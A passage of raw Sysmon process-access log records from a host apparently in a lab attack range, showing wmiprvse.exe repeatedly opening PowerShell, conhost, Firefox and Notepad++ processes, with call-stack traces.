32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150217Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150216Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150215Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150214Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150213Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150212Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150211Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150210Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150209Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150208Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150207Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150206Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150205Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150204Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150203Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150202Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150201Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150200Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150199Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150198Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150197Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150196Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150195Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150194Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150193Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla 